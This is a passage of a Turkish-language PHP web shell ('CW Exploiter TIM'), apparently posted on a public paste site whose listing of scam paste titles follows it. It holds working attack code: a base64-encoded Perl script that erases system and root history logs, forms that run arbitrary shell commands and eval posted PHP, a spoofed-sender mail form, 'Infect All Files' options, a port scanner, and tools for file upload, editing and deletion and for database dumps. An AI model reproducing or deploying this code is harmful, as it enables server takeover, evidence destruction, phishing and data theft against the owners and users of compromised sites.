3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwgXCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9nXCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBhaXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1wXCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3VyaXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwiLCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIvdmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dcIiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dcIiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAgICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2FmL3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxpbnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3NoX2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jvb3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwiL3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2FwYWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZlcmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9nL3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9mdHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBcIi9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBcIi92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhvcml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25ld3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNlXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9yc1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRfbG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwiL3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIpDQogICAgICAgICB9DQogICAgICAgICANCiAgIA==");
971
972		$openp = fopen("logseraser.pl", "w+")or die("Error");
973
974		fwrite($openp, $erase)or die("Error");
975
976		fclose($openp);
977
978		$aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
979
980		unlink("logseraser.pl");
981
982		echo "</textarea>";
983
984		}
985
986
987
988		if(isset($_POST['commex']))
989
990		{
991
992		echo "<tr><td>
993
994		<center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
995
996		<input name=cmd size=20 type=text>
997
998		<select name=functionz>
999
1000		<option>passthru</option>
1001
1002		<option>popen</option>
1003
1004		<option>exec</option>
1005
1006		<option>shell_exec</option>
1007
1008		<option>system</option>
1009
1010		</select><br><input type='submit' name='cmdex' value='Enter'></table>";
1011
1012		}
1013
1014		if(isset($_POST['cmdex']))
1015
1016		{ echo "<tr><td>";
1017
1018		switch (@$_POST['functionz']) {
1019
1020		case "system":
1021
1022		system(stripslashes($_POST['cmd']));
1023
1024
1025
1026		break;
1027
1028		case "popen":
1029
1030		$handle = popen($_POST['cmd'].' 2>&1', 'r');
1031
1032		echo "'$handle'; " . gettype($handle) . "\n";
1033
1034		$read = fread($handle, 2096);
1035
1036		echo $read;
1037
1038		pclose($handle);
1039
1040
1041
1042		break;
1043
1044		case "shell_exec":
1045
1046		shell_exec(stripslashes($_POST['cmd']));
1047
1048
1049
1050
1051
1052		break;
1053
1054		case "exec":
1055
1056		exec(stripslashes($_POST['cmd']));
1057
1058
1059
1060		break;
1061
1062		case "passthru":
1063
1064		passthru(stripslashes($_POST['cmd']));
1065
1066
1067
1068		}
1069
1070		}
1071
1072
1073
1074		elseif(isset($_POST['mail']))
1075
1076		{
1077
1078		echo "<form method='post' action=''>
1079
1080		<td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylý]</font></center>
1081
1082		<center><font face='Verdana' size='1'>Kime:<br>
1083
1084		<input type='text' size='19' name='mto'><br>
1085
1086		Kimden:<br>
1087
1088		<input type='text' size='19' name='mfrom'><br>
1089
1090		Konu:<br>
1091
1092		<input type='text' size='19' name='mobj'><br>
1093
1094		Mesaj:<br>
1095
1096		<textarea name='mtext' cols=20 rows=4></textarea><br>
1097
1098		<br><input type='submit' value='Yolla' name='senm'>
1099
1100		</form></table><br>";}
1101
1102		if(isset($_POST['senm']))
1103
1104		{
1105
1106		//Mail With HTML <- webcheatsheet.com
1107
1108		$to = $_POST['mto'];
1109
1110		$subject = $_POST['mobj'];
1111
1112		$contentz = $_POST['mtext']."<!--";
1113
1114		$random_hash = md5(date('r', time()));
1115
1116		$headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
1117
1118		$headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
1119
1120		ob_start();
1121
1122		?>
1123
1124		<script type="text/javascript" language="javascript">
1125
1126		<!--
1127
1128		ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
1129
1130		MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
1131
1132		OT="";
1133
1134		for(j=0;j<MI.length;j++){
1135
1136		OT+=ML.charAt(MI.charCodeAt(j)-48);
1137
1138		}document.write(OT);
1139
1140		// --></script>
1141
1142		--PHP-alt-<?php echo $random_hash; ?>
1143
1144		Content-Type: text/html; charset="iso-8859-1"
1145
1146		Content-Transfer-Encoding: 7bit
1147
1148
1149
1150		<? echo "$contentz"; ?>
1151
1152		--PHP-alt-<?php echo $random_hash; ?>--
1153
1154		<?
1155
1156		$message = ob_get_clean();
1157
1158
1159
1160		$mail = @mail( $to, $subject, $message, $headers );
1161
1162
1163
1164		if($mail) { echo "<br><td valign=top>
1165
1166		<center><font color='green' size='1'>Mail Sent</font></center></table>"; }
1167
1168		else { echo "<br><td valign=top>
1169
1170		<center><font color='red' size='1'>Error</font></center></table>"; }
1171
1172		}
1173
1174
1175
1176		elseif(isset($_POST['encoder'])) {
1177
1178		//Encoder
1179
1180		echo "<form method='post' action=''><td valign=top>
1181
1182		<center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>";
1183
1184		}
1185
1186		if(isset($_POST['encode'])) { echo "<td valign=top>
1187
1188		<center><font face='Verdana' size='1'>
1189
1190		MD5:     <input type='text' size='35' value='".md5($_POST['encod'])."'><br>
1191
1192		Sha1:    <input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
1193
1194		Crc32:    <input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
1195
1196		Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
1197
1198		Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
1199
1200
1201
1202		//File List
1203
1204		echo "</table><table width=100%><tr><td>
1205
1206		<center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
1207
1208		<center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
1209
1210		<font size='1'>
1211
1212		<td valign=top><font face='Verdana' size='2'><b>Dosya Adý :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
1213
1214		</table></center>";
1215
1216
1217
1218		echo "
1219
1220		<br>
1221
1222		<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
1223
1224		<center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
1225
1226		if(!isset($phpeval))
1227
1228		{
1229
1230		echo "
1231
1232		<form method='post' action=''>
1233
1234		<textarea name=php_eval cols=100 rows=5></textarea><br>
1235
1236		<input type='submit' value='Calistir!'>
1237
1238		</form>
1239
1240		";
1241
1242		}
1243
1244
1245
1246		if(isset($phpeval)) {
1247
1248		echo "
1249
1250		<form method='post' action=''>
1251
1252		<textarea name=php_eval cols=100 rows=10>";
1253
1254		$wr = '"';
1255
1256		$eval = @str_replace("<?","",$phpeval);
1257
1258		$eval = @str_replace("?>","",$phpeval);
1259
1260		@eval($eval);
1261
1262		echo "</textarea><br><input type='submit' value='Calistir!'></form>";
1263
1264
1265
1266		}
1267
1268		echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
1269
1270		if(isset($textzz)) { echo $textzz; }
1271
1272		if(isset($textz0)) { echo $textz0; }
1273
1274		echo "</center></form></td></tr><tr><td>
1275
1276		<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
1277
1278		<form method='post' action=''>
1279
1280		<input type='text' name='editfile' value=".$dir.">
1281
1282		<input type='submit' value='Go' name='doedit'>
1283
1284		</form>";
1285
1286		// Edit Files n3xpl0rer
1287
1288		if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
1289
1290		{
1291
1292		$file = $_POST['editfile'];
1293
1294		$content = file_get_contents($file);
1295
1296		echo "<form action='' method='post'><center>
1297
1298		<input type='hidden' name='editfile' value='".$file."'>
1299
1300		<textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
1301
1302		}
1303
1304		if(isset($_POST['edit'])) {
1305
1306		$file = $_POST['editfile'];
1307
1308		echo $file."<br />";
1309
1310		$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
1311
1312		fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
1313
1314		fclose($fh);
1315
1316		echo "Done.</td></tr>";
1317
1318		}
1319
1320		echo "
1321
1322		</table>
1323
1324		<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
1325
1326		<tr>
1327
1328		<td valign=top>
1329
1330		<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
1331
1332		<form name='directory' method='post' action=''>
1333
1334		<input type='text' name='dir' value=$dir>
1335
1336		<input type='submit' value='Go'>
1337
1338		</form></td><td>
1339
1340		<center><b><font size='2' face='Verdana'> Port Tarayýcý <br></font></b>
1341
1342		<form name='scanner' method='post'>
1343
1344		<input type='text' name='host' value='127.0.0.1' >
1345
1346		<select name='protocol'>
1347
1348		<option value='tcp'>tcp</option>
1349
1350		<option value='udp'>udp</option>
1351
1352		</select>
1353
1354		<input type='submit' value='Portlarý TARA'>
1355
1356		</form>
1357
1358		";
1359
1360		if(isset($host) && isset($proto))
1361
1362		{
1363
1364		echo "<font size='2' face='Verdana'>Open Ports:";
1365
1366
1367
1368		for($current = 0; $current <= 23; $current++)
1369
1370		{
1371
1372		$currents = $myports[$current];
1373
1374
1375
1376		$service = getservbyport($currents, $proto);
1377
1378
1379
1380
1381
1382		// Try to connect to port
1383
1384		$result = fsockopen($host, $currents, $errno, $errstr, 1);
1385
1386
1387
1388		// Show results
1389
1390		if($result)
1391
1392		{
1393
1394		echo "$currents, ";
1395
1396		}
1397
1398
1399
1400
1401
1402		}
1403
1404		}
1405
1406
1407
1408		echo "</font>
1409
1410		</td></tr>
1411
1412
1413
1414		<tr>
1415
1416		<td valign=top width=50%>
1417
1418		<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
1419
1420		<form method='post' action='' enctype='multipart/form-data'>
1421
1422		<input type='hidden' name='dare' value=$dir>
1423
1424		<input type='file' name='ffile'>
1425
1426		<input type='submit' name='ok' value='Upload!'>
1427
1428		</center>
1429
1430		</form>
1431
1432		</td>
1433
1434		<td valign=top>
1435
1436		<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
1437
1438		<form method='post' action=''>
1439
1440		<input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayý Sil' name='deletfilez'>
1441
1442		</center>
1443
1444		</form>
1445
1446		</td></tr>
1447
1448		<tr>
1449
1450		<td valign=top>
1451
1452
1453
1454		<center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b>
1455
1456		<form method='post' action=''>
1457
1458		<input type='text' name='makedir' value=$dir> <input type='submit' value='Oluþtur'>
1459
1460		</center>
1461
1462		</form>
1463
1464		</td>
1465
1466		<td valign=top>
1467
1468		<center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>
1469
1470		<form method='post' action=''>
1471
1472		<input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
1473
1474		</center>
1475
1476		</form>
1477
1478		</td></tr>
1479
1480		<tr>
1481
1482		<td valign=top width=50%>
1483
1484		<center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b>
1485
1486		<form method='post' action=''>
1487
1488		<input type='hidden' name='darezz' value=$dir>
1489
1490		<font size='1' face='Verdana'>ADI:</font><br>
1491
1492		<input type='text' name='names' size='30'><br>
1493
1494		<font size='1' face='Verdana'>Kodu:</font><br>
1495
1496		<textarea rows='16' cols='30' name='source'></textarea><br>
1497
1498		<input type='submit' value='Upload'>
1499
1500		</center>
1501
1502		</form>
1503
1504		</td>
1505
1506		<td valign=top width=50%>
1507
1508		<center><b><font size='2' face='Verdana'>Database<br></font></b>
1509
1510		<form method='post' action=''>
1511
1512		<font size='1' face='Verdana'>Username: - Password:</font><br>
1513
1514		<input type='text' name='user' size='10'>
1515
1516		<input type='text' name='passd' size='10'><br>
1517
1518		<font size='1' face='Verdana'>Host:</font><br>
1519
1520		<input type='text' name='host' value='localhost'><br>
1521
1522		<font size='1' face='Verdana'>DB Name:</font><br>
1523
1524		<input type='text' name='db'><br>
1525
1526		<font size='1' face='Verdana'>Sorgu:</font><br>
1527
1528		<textarea rows='10' cols='30' name='query'></textarea><br>
1529
1530		<input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
1531
1532		</center>
1533
1534		</form>
1535
1536		</td> </tr>
1537
1538
1539
1540		</table>
1541
1542		</table>
1543
1544		<br />
1545
1546		<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
1547
1548		<tr>
1549
1550		<td valign=top>
1551
1552		<center><b><font size='1' face='Verdana'>
1553
1554		CW Exploiter TIM // Cyber Security
1555
1556		</center></font></td></tr>
1557
1558		</body>
1559
1560		</html>";
1561
1562
1563
1564
1565
1566		?>

Public Pastes

⭐ Binance Account hack 35
JavaScript | 5 sec ago | 0.17 KB
⭐ FREE giftcards method NK
JavaScript | 12 sec ago | 0.17 KB
⭐ get any gift card for FREE⭐ 94
JavaScript | 14 sec ago | 0.17 KB
⭐ Binance Account hack I2
JavaScript | 20 sec ago | 0.17 KB
⭐️ EARN $500 INSTANTLY PH
JavaScript | 23 sec ago | 0.17 KB
⭐ get any gift card for PE
JavaScript | 29 sec ago | 0.17 KB
⭐ FREE giftcards method⭐ 9U
JavaScript | 32 sec ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ SK
JavaScript | 37 sec ago | 0.17 KB